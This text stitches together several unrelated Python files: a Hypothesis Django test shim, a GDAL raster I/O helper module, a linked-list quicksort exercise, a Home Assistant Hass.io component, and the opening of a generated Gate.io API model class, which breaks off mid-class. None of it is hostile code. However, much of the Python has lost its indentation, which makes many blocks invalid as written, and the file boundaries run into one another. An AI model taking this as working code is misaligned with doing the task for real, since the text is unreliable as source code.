# coding=utf-8
#
# This file is part of Hypothesis, which may be found at
# https://github.com/HypothesisWorks/hypothesis-python
#
# Most of this work is copyright (C) 2013-2018 David R. MacIver
# (david@drmaciver.com), but it contains contributions by others. See
# CONTRIBUTING.rst for a full list of people who may hold copyright, and
# consult the git log if you need to determine who owns an individual
# contribution.
#
# This Source Code Form is subject to the terms of the Mozilla Public License,
# v. 2.0. If a copy of the MPL was not distributed with this file, You can
# obtain one at http://mozilla.org/MPL/2.0/.
#
# END HEADER
import unittest
import django.test as dt
class HypothesisTestCase(object):
def setup_example(self):
self._pre_setup()
def teardown_example(self, example):
self._post_teardown()
def __call__(self, result=None):
testMethod = getattr(self, self._testMethodName)
if getattr(testMethod, u'is_hypothesis_test', False):
return unittest.TestCase.__call__(self, result)
else:
return dt.SimpleTestCase.__call__(self, result)
class TestCase(HypothesisTestCase, dt.TestCase):
pass
class TransactionTestCase(HypothesisTestCase, dt.TransactionTestCase):
pass
|
#! /usr/bin/env python
"""
Functions for IO, mostly wrapped around GDAL
Note: This was all written before RasterIO existed, which might be a better choice.
"""
import os
import subprocess
import numpy as np
from osgeo import gdal, gdal_array, osr
#Define drivers
mem_drv = gdal.GetDriverByName('MEM')
gtif_drv = gdal.GetDriverByName('GTiff')
vrt_drv = gdal.GetDriverByName("VRT")
#Default GDAL creation options
gdal_opt = ['COMPRESS=LZW', 'TILED=YES', 'BIGTIFF=IF_SAFER']
#gdal_opt += ['BLOCKXSIZE=1024', 'BLOCKYSIZE=1024']
#List that can be used for building commands
gdal_opt_co = []
for co in gdal_opt:
    gdal_opt_co.extend(('-co', co))
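#Example (illustrative sketch, not part of the original module): the gdal_opt_co
#list can be spliced into a GDAL command line built for subprocess, e.g.:
#   cmd = ['gdal_translate'] + gdal_opt_co + ['in.tif', 'out.tif']
#   subprocess.call(cmd)
#'in.tif' and 'out.tif' are placeholder filenames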
#Add methods to load ma from OpenCV, PIL, etc.
#These formats should be directly readable as np arrays
#Note: want to modify to import all bands as separate arrays in ndarray
#Unless the user requests a single band, or range of bands
#Check for file existence
def fn_check(fn):
"""Wrapper to check for file existence
Parameters
----------
fn : str
Input filename string.
Returns
-------
bool
True if file exists, False otherwise.
"""
return os.path.exists(fn)
def fn_check_full(fn):
"""Check for file existence
Avoids race condition, but slower than os.path.exists.
Parameters
----------
fn : str
Input filename string.
Returns
-------
    bool
        True if file exists, False otherwise.
"""
status = True
if not os.path.isfile(fn):
status = False
else:
try:
open(fn)
except IOError:
status = False
return status
def fn_list_check(fn_list):
status = True
for fn in fn_list:
if not fn_check(fn):
print('Unable to find: %s' % fn)
status = False
return status
def fn_list_valid(fn_list):
print('%i input fn' % len(fn_list))
out_list = []
for fn in fn_list:
if not fn_check(fn):
print('Unable to find: %s' % fn)
else:
out_list.append(fn)
print('%i output fn' % len(out_list))
return out_list
#Wrapper around gdal.Open
def fn_getds(fn):
"""Wrapper around gdal.Open()
"""
ds = None
if fn_check(fn):
ds = gdal.Open(fn, gdal.GA_ReadOnly)
else:
print("Unable to find %s" % fn)
return ds
def fn_getma(fn, bnum=1):
"""Get masked array from input filename
Parameters
----------
fn : str
Input filename string
bnum : int, optional
Band number
Returns
-------
np.ma.array
Masked array containing raster values
"""
#Add check for filename existence
ds = fn_getds(fn)
return ds_getma(ds, bnum=bnum)
#Given input dataset, return a masked array for the input band
def ds_getma(ds, bnum=1):
"""Get masked array from input GDAL Dataset
Parameters
----------
ds : gdal.Dataset
        Input GDAL Dataset
bnum : int, optional
Band number
Returns
-------
np.ma.array
Masked array containing raster values
"""
b = ds.GetRasterBand(bnum)
return b_getma(b)
#Given input band, return a masked array
def b_getma(b):
"""Get masked array from input GDAL Band
Parameters
----------
b : gdal.Band
Input GDAL Band
Returns
-------
np.ma.array
Masked array containing raster values
"""
b_ndv = get_ndv_b(b)
#bma = np.ma.masked_equal(b.ReadAsArray(), b_ndv)
#This is more appropriate for float, handles precision issues
bma = np.ma.masked_values(b.ReadAsArray(), b_ndv)
return bma
def get_sub_dim(src_ds, scale=None, maxdim=1024):
"""Compute dimensions of subsampled dataset
Parameters
----------
ds : gdal.Dataset
        Input GDAL Dataset
scale : int, optional
Scaling factor
maxdim : int, optional
Maximum dimension along either axis, in pixels
Returns
-------
    ns : int
        Number of samples in subsampled output
    nl : int
        Number of lines in subsampled output
    scale : float
        Final scaling factor
"""
ns = src_ds.RasterXSize
nl = src_ds.RasterYSize
maxdim = float(maxdim)
if scale is None:
scale_ns = ns/maxdim
scale_nl = nl/maxdim
scale = max(scale_ns, scale_nl)
#Need to check to make sure scale is positive real
if scale > 1:
ns = int(round(ns/scale))
nl = int(round(nl/scale))
return ns, nl, scale
def fn_getma_sub(fn, bnum=1, scale=None, maxdim=1024., return_ds=False):
ds = gdal.Open(fn)
return ds_getma_sub(ds, bnum=bnum, scale=scale, maxdim=maxdim, return_ds=return_ds)
#Load a subsampled array
#Can specify scale factor or max dimension
#No need to load the entire dataset for stats computation
def ds_getma_sub(src_ds, bnum=1, scale=None, maxdim=1024., return_ds=False):
"""Load a subsampled array, rather than full resolution
This is useful when working with large rasters
Uses buf_xsize and buf_ysize options from GDAL ReadAsArray method.
Parameters
----------
ds : gdal.Dataset
        Input GDAL Dataset
bnum : int, optional
Band number
scale : int, optional
Scaling factor
maxdim : int, optional
Maximum dimension along either axis, in pixels
Returns
-------
np.ma.array
Masked array containing raster values
"""
#print src_ds.GetFileList()[0]
b = src_ds.GetRasterBand(bnum)
b_ndv = get_ndv_b(b)
ns, nl, scale = get_sub_dim(src_ds, scale, maxdim)
#The buf_size parameters determine the final array dimensions
b_array = b.ReadAsArray(buf_xsize=ns, buf_ysize=nl)
bma = np.ma.masked_values(b_array, b_ndv)
out = bma
if return_ds:
dtype = src_ds.GetRasterBand(1).DataType
src_ds_sub = gdal.GetDriverByName('MEM').Create('', ns, nl, 1, dtype)
gt = np.array(src_ds.GetGeoTransform())
gt[[1,5]] = gt[[1,5]]*scale
src_ds_sub.SetGeoTransform(list(gt))
src_ds_sub.SetProjection(src_ds.GetProjection())
b = src_ds_sub.GetRasterBand(1)
b.WriteArray(bma)
b.SetNoDataValue(b_ndv)
out = (bma, src_ds_sub)
return out
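#Usage sketch (assumes an existing GeoTIFF 'dem.tif'): load a subsampled masked
#array for quick statistics without reading the full-resolution raster
#   bma = fn_getma_sub('dem.tif', maxdim=1024)
#   print(bma.mean(), bma.std())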
#Note: need to consolidate with warplib.writeout (takes ds, not ma)
#Add option to build overviews when writing GTiff
#Input proj must be WKT
def writeGTiff(a, dst_fn, src_ds=None, bnum=1, ndv=None, gt=None, proj=None, create=False, sparse=False):
"""Write input array to disk as GeoTiff
Parameters
----------
a : np.array or np.ma.array
Input array
dst_fn : str
Output filename
src_ds: GDAL Dataset, optional
Source Dataset to use for creating copy
bnum : int, optional
Output band
ndv : float, optional
Output NoData Value
gt : list, optional
Output GeoTransform
proj : str, optional
Output Projection (OGC WKT or PROJ.4 format)
create : bool, optional
Create new dataset
sparse : bool, optional
Output should be created with sparse options
"""
    #If input is not np.ma, this creates a new ma, which has default fill_value of 1E20
#Must manually override with ndv
#Also consumes a lot of memory
#Should bypass if input is bool
from pygeotools.lib.malib import checkma
a = checkma(a, fix=False)
#Want to preserve fill_value if already specified
if ndv is not None:
a.set_fill_value(ndv)
driver = gtif_drv
#Currently only support writing singleband rasters
#if a.ndim > 2:
# np_nbands = a.shape[2]
# if src_ds.RasterCount np_nbands:
# for bnum in np_nbands:
nbands = 1
np_dt = a.dtype.name
if src_ds is not None:
#If this is a fn, get a ds
#Note: this saves a lot of unnecessary iolib.fn_getds calls
if isinstance(src_ds, str):
src_ds = fn_getds(src_ds)
#if isinstance(src_ds, gdal.Dataset):
src_dt = gdal.GetDataTypeName(src_ds.GetRasterBand(bnum).DataType)
src_gt = src_ds.GetGeoTransform()
#This is WKT
src_proj = src_ds.GetProjection()
#src_srs = osr.SpatialReference()
#src_srs.ImportFromWkt(src_ds.GetProjectionRef())
#Probably a cleaner way to handle this
if gt is None:
gt = src_gt
if proj is None:
proj = src_proj
#Need to create a new copy of the default options
opt = list(gdal_opt)
#Note: packbits is better for sparse data
if sparse:
opt.remove('COMPRESS=LZW')
opt.append('COMPRESS=PACKBITS')
#Not sure if VW can handle sparse tif
#opt.append('SPARSE_OK=TRUE')
#Use predictor=3 for floating point data
if 'float' in np_dt.lower() and 'COMPRESS=LZW' in opt:
opt.append('PREDICTOR=3')
#If input ma is same as src_ds, write out array using CreateCopy from existing dataset
#if not create and (src_ds is not None) and ((a.shape[0] == src_ds.RasterYSize) and (a.shape[1] == src_ds.RasterXSize) and (np_dt.lower() == src_dt.lower())):
#Should compare srs.IsSame(src_srs)
if not create and (src_ds is not None) and ((a.shape[0] == src_ds.RasterYSize) and (a.shape[1] == src_ds.RasterXSize) and (np_dt.lower() == src_dt.lower())) and (src_gt == gt) and (src_proj == proj):
#Note: third option is strict flag, set to false
dst_ds = driver.CreateCopy(dst_fn, src_ds, 0, options=opt)
#Otherwise, use Create
else:
a_dtype = a.dtype
gdal_dtype = np2gdal_dtype(a_dtype)
if a_dtype.name == 'bool':
#Set ndv to 0
a.fill_value = False
opt.remove('COMPRESS=LZW')
opt.append('COMPRESS=DEFLATE')
#opt.append('NBITS=1')
#Create(fn, nx, ny, nbands, dtype, opt)
dst_ds = driver.Create(dst_fn, a.shape[1], a.shape[0], nbands, gdal_dtype, options=opt)
#Note: Need GeoMA here to make this work, or accept gt as argument
#Could also do ds creation in calling script
if gt is not None:
dst_ds.SetGeoTransform(gt)
if proj is not None:
dst_ds.SetProjection(proj)
dst_ds.GetRasterBand(bnum).WriteArray(a.filled())
dst_ds.GetRasterBand(bnum).SetNoDataValue(float(a.fill_value))
dst_ds = None
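#Usage sketch (hypothetical filenames): read a masked array, modify it, and write
#it back out, using the source dataset to carry over geotransform and projection
#   ds = fn_getds('dem.tif')
#   bma = ds_getma(ds)
#   writeGTiff(bma + 10, 'dem_plus10.tif', src_ds=ds)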
def writevrt(out_csv,srs='EPSG:4326',x='field_1',y='field_2'):
"""
Write out a vrt to accompany a csv of points
"""
out_vrt = os.path.splitext(out_csv)[0]+'.vrt'
out_csv = os.path.split(out_csv)[-1]
f = open(out_vrt, 'w')
f.write('<OGRVRTDataSource>\n')
f.write(' <OGRVRTLayer name="%s">\n' % os.path.splitext(out_csv)[0])
f.write(' <SrcDataSource>%s</SrcDataSource>\n' % out_csv)
f.write(' <GeometryType>wkbPoint</GeometryType>\n')
f.write(' <LayerSRS>%s</LayerSRS>\n' % srs)
f.write(' <GeometryField encoding="PointFromColumns" x="%s" y="%s"/>\n' % (x, y))
f.write(' </OGRVRTLayer>\n')
f.write('</OGRVRTDataSource>\n')
f.close()
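#Usage sketch (assumed CSV layout): for 'points.csv' with longitude in the first
#column and latitude in the second, this writes 'points.vrt' so OGR tools can
#treat the csv as a point layer
#   writevrt('points.csv', srs='EPSG:4326', x='field_1', y='field_2')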
#Move to geolib?
#Look up equivalent GDAL data type
def np2gdal_dtype(d):
"""
Get GDAL RasterBand datatype that corresponds with NumPy datatype
Input should be numpy array or numpy dtype
"""
dt_dict = gdal_array.codes
if isinstance(d, (np.ndarray, np.generic)):
d = d.dtype
#This creates dtype from another built-in type
#d = np.dtype(d)
if isinstance(d, np.dtype):
if d.name == 'int8':
gdal_dt = 1
elif d.name == 'bool':
#Write out as Byte
gdal_dt = 1
else:
gdal_dt = list(dt_dict.keys())[list(dt_dict.values()).index(d)]
else:
print("Input must be NumPy array or NumPy dtype")
gdal_dt = None
return gdal_dt
def gdal2np_dtype(b):
"""
Get NumPy datatype that corresponds with GDAL RasterBand datatype
Input can be filename, GDAL Dataset, GDAL RasterBand, or GDAL integer dtype
"""
dt_dict = gdal_array.codes
if isinstance(b, str):
b = gdal.Open(b)
if isinstance(b, gdal.Dataset):
b = b.GetRasterBand(1)
if isinstance(b, gdal.Band):
b = b.DataType
if isinstance(b, int):
np_dtype = dt_dict[b]
else:
np_dtype = None
print("Input must be GDAL Dataset or RasterBand object")
return np_dtype
#Replace nodata value in GDAL band
def replace_ndv(b, new_ndv):
b_ndv = get_ndv_b(b)
bma = np.ma.masked_values(b.ReadAsArray(), b_ndv)
bma.set_fill_value(new_ndv)
b.WriteArray(bma.filled())
b.SetNoDataValue(new_ndv)
return b
def set_ndv(dst_fn, ndv):
dst_ds = gdal.Open(dst_fn, gdal.GA_Update)
for n in range(1, dst_ds.RasterCount+1):
b = dst_ds.GetRasterBand(1)
b.SetNoDataValue(ndv)
dst_ds = None
#Should overload these functions to handle fn, ds, or b
#Perhaps abstract, as many functions will need this functionality
def get_ndv_fn(fn):
ds = gdal.Open(fn, gdal.GA_ReadOnly)
return get_ndv_ds(ds)
#Want to modify to handle multi-band images and return list of ndv
def get_ndv_ds(ds, bnum=1):
b = ds.GetRasterBand(bnum)
return get_ndv_b(b)
#Return nodata value for GDAL band
def get_ndv_b(b):
"""Get NoData value for GDAL band.
    If NoDataValue is not set in the band, check the upper-left and
    lower-right pixel values: if they match (or the upper-left is NaN),
    use that value; otherwise assume the NoDataValue is 0.
Parameters
----------
b : GDALRasterBand object
This is the input band.
Returns
-------
b_ndv : float
NoData value
"""
b_ndv = b.GetNoDataValue()
if b_ndv is None:
#Check ul pixel for ndv
ns = b.XSize
nl = b.YSize
ul = float(b.ReadAsArray(0, 0, 1, 1))
#ur = float(b.ReadAsArray(ns-1, 0, 1, 1))
lr = float(b.ReadAsArray(ns-1, nl-1, 1, 1))
#ll = float(b.ReadAsArray(0, nl-1, 1, 1))
#Probably better to use 3/4 corner criterion
#if ul == ur == lr == ll:
if np.isnan(ul) or ul == lr:
b_ndv = ul
else:
#Assume ndv is 0
b_ndv = 0
elif np.isnan(b_ndv):
b_dt = gdal.GetDataTypeName(b.DataType)
if 'Float' in b_dt:
b_ndv = np.nan
else:
b_ndv = 0
return b_ndv
#Write out a recarray as a csv
def write_recarray(outfn, ra):
with open(outfn,'w') as f:
f.write(','.join([str(item) for item in ra.dtype.names])+'\n')
for row in ra:
f.write(','.join([str(item) for item in row])+'\n')
#Check to make sure image doesn't contain errors
def image_check(fn):
ds = gdal.Open(fn)
status = True
for i in range(ds.RasterCount):
ds.GetRasterBand(i+1).Checksum()
if gdal.GetLastErrorType() != 0:
status = False
return status
#Return number of CPUs
#Logical is "virtual" cpu count with hyperthreading
#Set to False for physical cpu count
def cpu_count(logical=True):
"""Return system CPU count
"""
if logical:
from multiprocessing import cpu_count
ncpu=cpu_count()
else:
import psutil
ncpu=psutil.cpu_count(logical=False)
return ncpu
def setstripe(dir, threads=cpu_count()):
#import socket
#if 'nasa' in socket.getfqdn():
#Better to use 'df -T' to determine filesystem of directory
#Can do this with psutil Python lib, but need to also find mount point of file
if dir is not None:
if 'lustre' in str(subprocess.check_output(['df','-T'])):
if os.path.exists(dir):
if threads is None:
threads = cpu_count()
cmd = ['lfs', 'setstripe', dir, '-c', str(threads)]
print(' '.join(cmd))
subprocess.call(cmd)
#This is a shared directory for files like LULC, used by multiple tools
#Default location is $HOME/data
#Can specify in ~/.bashrc or ~/.profile
#export DATADIR=$HOME/data
def get_datadir():
default_datadir = os.path.join(os.path.expanduser('~'), 'data')
datadir = os.environ.get('DATADIR', default_datadir)
if not os.path.exists(datadir):
os.makedirs(datadir)
return datadir
#Function to get files using urllib
#This works with ftp
def getfile(url, outdir=None):
"""Function to fetch files using urllib
Works with ftp
"""
fn = os.path.split(url)[-1]
if outdir is not None:
fn = os.path.join(outdir, fn)
if not os.path.exists(fn):
#Find appropriate urlretrieve for Python 2 and 3
try:
from urllib.request import urlretrieve
except ImportError:
from urllib import urlretrieve
print("Retrieving: %s" % url)
#Add progress bar
urlretrieve(url, fn)
return fn
#Function to get files using requests
#Works with https authentication
def getfile2(url, auth=None, outdir=None):
"""Function to fetch files using requests
Works with https authentication
"""
import requests
print("Retrieving: %s" % url)
fn = os.path.split(url)[-1]
if outdir is not None:
fn = os.path.join(outdir, fn)
if auth is not None:
r = requests.get(url, stream=True, auth=auth)
else:
r = requests.get(url, stream=True)
chunk_size = 1000000
with open(fn, 'wb') as fd:
for chunk in r.iter_content(chunk_size):
fd.write(chunk)
#Get necessary credentials to access MODSCAG products - hopefully this will soon be archived with NSIDC
def get_auth():
"""Get authorization token for https
"""
import getpass
from requests.auth import HTTPDigestAuth
#This binds raw_input to input for Python 2
input_func = input
try:
input_func = raw_input
except NameError:
pass
uname = input_func("MODSCAG Username:")
pw = getpass.getpass("MODSCAG Password:")
auth = HTTPDigestAuth(uname, pw)
#wget -A'h8v4*snow_fraction.tif' --user=uname --password=pw
return auth
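#Usage sketch (hypothetical URL): combine get_auth() with getfile2() to fetch a
#product behind https digest authentication
#   auth = get_auth()
#   getfile2('https://example.com/h8v4/snow_fraction.tif', auth=auth)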
def readcsv(fn):
"""
Wrapper to read arbitrary csv, check for header
Needs some work to be more robust, quickly added for demcoreg sampling
"""
import csv
#Check first line for header
with open(fn, 'r') as f:
reader = csv.DictReader(f)
hdr = reader.fieldnames
#Assume there is a header on first line, check
skiprows = 1
    if all(field.isdigit() for field in hdr):
        hdr = None
        skiprows = 0
#Check header for lat/lon/z or x/y/z tags
#Should probably do genfromtxt here if header exists and dtype of cols is variable
pts = np.loadtxt(fn, delimiter=',', skiprows=skiprows, dtype=None)
return pts
|
# Return the last (tail) node of the linked list
def getLink(head):
temp = head
while temp is not None and temp.next is not None:
temp = temp.next
return temp
# Recursively sort the sublist from head to link (the tail); partition() returns the pivot, newHead and newLink
def quickSortRec(head, link):
if head is None or head == link:
return head
newHead = None
newLink = None
pivot, newHead, newLink = partition(head, link, newHead, newLink)
if newHead != pivot:
temp = newHead
while temp.next != pivot:
temp = temp.next
temp.next = None
newHead = quickSortRec(newHead, temp)
temp = getLink(newHead)
temp.next = pivot
pivot.next = quickSortRec(pivot.next, newLink)
return newHead
# Partition the list around the pivot (the tail node Link):
# nodes with values less than the pivot stay to its left,
# nodes with values greater than or equal to the pivot are moved to its right
def partition(head, Link, newHead, newLink):
pivot = Link
prev = None
curr = head
end = pivot
while curr is not pivot:
if curr.data < pivot.data:
if newHead is None:
newHead = curr
prev = curr
curr = curr.next
else:
if prev:
prev.next = curr.next
temp = curr.next
curr.next = None
end.next = curr
end = curr
curr = temp
if newHead is None:
newHead = pivot
newLink = end
return pivot, newHead, newLink
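# The driver code below calls quickSort(); this minimal wrapper (assumed here,
# not part of the original snippet) starts the recursion with the tail node from getLink()
def quickSort(head):
    return quickSortRec(head, getLink(head))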
#Driver's code
from collections import defaultdict
class Node:
def __init__(self,data):
self.data=data
self.next=None
class Llist:
def __init__(self):
self.head=None
def insert(self,data,tail):
node=Node(data)
if not self.head:
self.head=node
return node
tail.next=node
return node
def nodeID(head,dic):
while head:
dic[head.data].append(id(head))
head=head.next
def printList(head,dic):
while head:
if id(head) not in dic[head.data]:
            print("Don't swap data, swap pointers/nodes")
return
print(head.data,end=' ')
head=head.next
if __name__ == '__main__':
t=int(input())
for i in range(t):
n=int(input())
arr=[int(x) for x in input().split()]
ll=Llist()
tail=None
for nodeData in arr:
tail=ll.insert(nodeData,tail)
        dic=defaultdict(list) # dictionary to keep data and id of node
nodeID(ll.head,dic) # putting data and its id
resHead=quickSort(ll.head)
printList(resHead,dic) #verifying and printing
print()
|
"""Support for Hass.io."""
from datetime import timedelta
import logging
import os
import voluptuous as vol
from homeassistant.auth.const import GROUP_ID_ADMIN
from homeassistant.components.homeassistant import SERVICE_CHECK_CONFIG
import homeassistant.config as conf_util
from homeassistant.const import (
ATTR_NAME,
EVENT_CORE_CONFIG_UPDATE,
SERVICE_HOMEASSISTANT_RESTART,
SERVICE_HOMEASSISTANT_STOP,
)
from homeassistant.core import DOMAIN as HASS_DOMAIN, callback
from homeassistant.exceptions import HomeAssistantError
import homeassistant.helpers.config_validation as cv
from homeassistant.loader import bind_hass
from homeassistant.util.dt import utcnow
from .addon_panel import async_setup_addon_panel
from .auth import async_setup_auth_view
from .discovery import async_setup_discovery_view
from .handler import HassIO, HassioAPIError
from .http import HassIOView
from .ingress import async_setup_ingress_view
_LOGGER = logging.getLogger(__name__)
DOMAIN = "hassio"
STORAGE_KEY = DOMAIN
STORAGE_VERSION = 1
CONF_FRONTEND_REPO = "development_repo"
CONFIG_SCHEMA = vol.Schema(
{vol.Optional(DOMAIN): vol.Schema({vol.Optional(CONF_FRONTEND_REPO): cv.isdir})},
extra=vol.ALLOW_EXTRA,
)
DATA_HOMEASSISTANT_VERSION = "hassio_hass_version"
HASSIO_UPDATE_INTERVAL = timedelta(minutes=55)
SERVICE_ADDON_START = "addon_start"
SERVICE_ADDON_STOP = "addon_stop"
SERVICE_ADDON_RESTART = "addon_restart"
SERVICE_ADDON_STDIN = "addon_stdin"
SERVICE_HOST_SHUTDOWN = "host_shutdown"
SERVICE_HOST_REBOOT = "host_reboot"
SERVICE_SNAPSHOT_FULL = "snapshot_full"
SERVICE_SNAPSHOT_PARTIAL = "snapshot_partial"
SERVICE_RESTORE_FULL = "restore_full"
SERVICE_RESTORE_PARTIAL = "restore_partial"
ATTR_ADDON = "addon"
ATTR_INPUT = "input"
ATTR_SNAPSHOT = "snapshot"
ATTR_ADDONS = "addons"
ATTR_FOLDERS = "folders"
ATTR_HOMEASSISTANT = "homeassistant"
ATTR_PASSWORD = "password"
SCHEMA_NO_DATA = vol.Schema({})
SCHEMA_ADDON = vol.Schema({vol.Required(ATTR_ADDON): cv.slug})
SCHEMA_ADDON_STDIN = SCHEMA_ADDON.extend(
{vol.Required(ATTR_INPUT): vol.Any(dict, cv.string)}
)
SCHEMA_SNAPSHOT_FULL = vol.Schema(
{vol.Optional(ATTR_NAME): cv.string, vol.Optional(ATTR_PASSWORD): cv.string}
)
SCHEMA_SNAPSHOT_PARTIAL = SCHEMA_SNAPSHOT_FULL.extend(
{
vol.Optional(ATTR_FOLDERS): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(ATTR_ADDONS): vol.All(cv.ensure_list, [cv.string]),
}
)
SCHEMA_RESTORE_FULL = vol.Schema(
{vol.Required(ATTR_SNAPSHOT): cv.slug, vol.Optional(ATTR_PASSWORD): cv.string}
)
SCHEMA_RESTORE_PARTIAL = SCHEMA_RESTORE_FULL.extend(
{
vol.Optional(ATTR_HOMEASSISTANT): cv.boolean,
vol.Optional(ATTR_FOLDERS): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(ATTR_ADDONS): vol.All(cv.ensure_list, [cv.string]),
}
)
MAP_SERVICE_API = {
SERVICE_ADDON_START: ("/addons/{addon}/start", SCHEMA_ADDON, 60, False),
SERVICE_ADDON_STOP: ("/addons/{addon}/stop", SCHEMA_ADDON, 60, False),
SERVICE_ADDON_RESTART: ("/addons/{addon}/restart", SCHEMA_ADDON, 60, False),
SERVICE_ADDON_STDIN: ("/addons/{addon}/stdin", SCHEMA_ADDON_STDIN, 60, False),
SERVICE_HOST_SHUTDOWN: ("/host/shutdown", SCHEMA_NO_DATA, 60, False),
SERVICE_HOST_REBOOT: ("/host/reboot", SCHEMA_NO_DATA, 60, False),
SERVICE_SNAPSHOT_FULL: ("/snapshots/new/full", SCHEMA_SNAPSHOT_FULL, 300, True),
SERVICE_SNAPSHOT_PARTIAL: (
"/snapshots/new/partial",
SCHEMA_SNAPSHOT_PARTIAL,
300,
True,
),
SERVICE_RESTORE_FULL: (
"/snapshots/{snapshot}/restore/full",
SCHEMA_RESTORE_FULL,
300,
True,
),
SERVICE_RESTORE_PARTIAL: (
"/snapshots/{snapshot}/restore/partial",
SCHEMA_RESTORE_PARTIAL,
300,
True,
),
}
@callback
@bind_hass
def get_homeassistant_version(hass):
"""Return latest available Home Assistant version.
Async friendly.
"""
return hass.data.get(DATA_HOMEASSISTANT_VERSION)
@callback
@bind_hass
def is_hassio(hass):
"""Return true if Hass.io is loaded.
Async friendly.
"""
return DOMAIN in hass.config.components
async def async_setup(hass, config):
"""Set up the Hass.io component."""
# Check local setup
for env in ("HASSIO", "HASSIO_TOKEN"):
if os.environ.get(env):
continue
_LOGGER.error("Missing %s environment variable.", env)
return False
host = os.environ["HASSIO"]
websession = hass.helpers.aiohttp_client.async_get_clientsession()
hass.data[DOMAIN] = hassio = HassIO(hass.loop, websession, host)
if not await hassio.is_connected():
        _LOGGER.warning("Not connected with Hass.io / system too busy!")
store = hass.helpers.storage.Store(STORAGE_VERSION, STORAGE_KEY)
data = await store.async_load()
if data is None:
data = {}
refresh_token = None
if "hassio_user" in data:
user = await hass.auth.async_get_user(data["hassio_user"])
if user and user.refresh_tokens:
refresh_token = list(user.refresh_tokens.values())[0]
# Migrate old Hass.io users to be admin.
if not user.is_admin:
await hass.auth.async_update_user(user, group_ids=[GROUP_ID_ADMIN])
if refresh_token is None:
user = await hass.auth.async_create_system_user("Hass.io", [GROUP_ID_ADMIN])
refresh_token = await hass.auth.async_create_refresh_token(user)
data["hassio_user"] = user.id
await store.async_save(data)
# This overrides the normal API call that would be forwarded
development_repo = config.get(DOMAIN, {}).get(CONF_FRONTEND_REPO)
if development_repo is not None:
hass.http.register_static_path(
"/api/hassio/app", os.path.join(development_repo, "hassio/build"), False
)
hass.http.register_view(HassIOView(host, websession))
if "frontend" in hass.config.components:
await hass.components.panel_custom.async_register_panel(
frontend_url_path="hassio",
webcomponent_name="hassio-main",
sidebar_title="Hass.io",
sidebar_icon="hass:home-assistant",
js_url="/api/hassio/app/entrypoint.js",
embed_iframe=True,
require_admin=True,
)
await hassio.update_hass_api(config.get("http", {}), refresh_token)
async def push_config(_):
"""Push core config to Hass.io."""
await hassio.update_hass_timezone(str(hass.config.time_zone))
hass.bus.async_listen(EVENT_CORE_CONFIG_UPDATE, push_config)
await push_config(None)
async def async_service_handler(service):
"""Handle service calls for Hass.io."""
api_command = MAP_SERVICE_API[service.service][0]
data = service.data.copy()
addon = data.pop(ATTR_ADDON, None)
snapshot = data.pop(ATTR_SNAPSHOT, None)
payload = None
# Pass data to Hass.io API
if service.service == SERVICE_ADDON_STDIN:
payload = data[ATTR_INPUT]
elif MAP_SERVICE_API[service.service][3]:
payload = data
# Call API
try:
await hassio.send_command(
api_command.format(addon=addon, snapshot=snapshot),
payload=payload,
timeout=MAP_SERVICE_API[service.service][2],
)
except HassioAPIError as err:
_LOGGER.error("Error on Hass.io API: %s", err)
for service, settings in MAP_SERVICE_API.items():
hass.services.async_register(
DOMAIN, service, async_service_handler, schema=settings[1]
)
async def update_homeassistant_version(now):
"""Update last available Home Assistant version."""
try:
data = await hassio.get_homeassistant_info()
hass.data[DATA_HOMEASSISTANT_VERSION] = data["last_version"]
except HassioAPIError as err:
_LOGGER.warning("Can't read last version: %s", err)
hass.helpers.event.async_track_point_in_utc_time(
update_homeassistant_version, utcnow() + HASSIO_UPDATE_INTERVAL
)
# Fetch last version
await update_homeassistant_version(None)
async def async_handle_core_service(call):
"""Service handler for handling core services."""
if call.service == SERVICE_HOMEASSISTANT_STOP:
await hassio.stop_homeassistant()
return
try:
errors = await conf_util.async_check_ha_config_file(hass)
except HomeAssistantError:
return
if errors:
_LOGGER.error(errors)
hass.components.persistent_notification.async_create(
"Config error. See [the logs](/developer-tools/logs) for details.",
"Config validating",
f"{HASS_DOMAIN}.check_config",
)
return
if call.service == SERVICE_HOMEASSISTANT_RESTART:
await hassio.restart_homeassistant()
# Mock core services
for service in (
SERVICE_HOMEASSISTANT_STOP,
SERVICE_HOMEASSISTANT_RESTART,
SERVICE_CHECK_CONFIG,
):
hass.services.async_register(HASS_DOMAIN, service, async_handle_core_service)
# Init discovery Hass.io feature
async_setup_discovery_view(hass, hassio)
# Init auth Hass.io feature
async_setup_auth_view(hass, user)
# Init ingress Hass.io feature
async_setup_ingress_view(hass, host)
# Init add-on ingress panels
await async_setup_addon_panel(hass, hassio)
return True
|
# coding: utf-8
"""
Gate API v4
    Welcome to Gate.io API. APIv4 provides spot, margin and futures trading operations. There are public APIs to retrieve the real-time market statistics, and private APIs which need authentication to trade on a user's behalf. # noqa: E501
Contact: support@mail.gate.io
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from gate_api.configuration import Configuration
class MarginAccountBook(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'id': 'str',
'time': 'str',
'time_ms': 'int',
'currency': 'str',
'currency_pair': 'str',
'change': 'str',
'balance': 'str',
}
attribute_map = {
'id': 'id',
'time': 'time',
'time_ms': 'time_ms',
'currency': 'currency',
'currency_pair': 'currency_pair',
'change': 'change',
'balance': 'balance',
}
def __init__(
self,
id=None,
time=None,
time_ms=None,
currency=None,
currency_pair=None,
change=None,
balance=None,
local_vars_configuration=None,
): # noqa: E501
# type: (str, str, int, str, str, str, str, Configuration) -> None
"""MarginAccountBook - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._id = None
self._time = None
self._time_ms = None
self._currency = None
self._currency_pair = None
self._change = None
self._balance = None
self.discriminator = None
if id is not None:
self.id = id
if time is not None:
self.time = time
if time_ms is not None:
self.time_ms = time_ms
if currency is not None:
self.currency = currency
if currency_pair is not None:
self.currency_pair = currency_pair
if change is not None:
self.change = change
if balance is not None:
self.balance = balance
@property
def id(self):
"""Gets the id of this MarginAccountBook. # noqa: E501
Balance change record ID # noqa: E501
:return: The id of this MarginAccountBook. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this MarginAccountBook.
Balance change record ID # noqa: E501
:param id: The id of this MarginAccountBook. # noqa: E501
:type: str
"""
self._id = id
@property
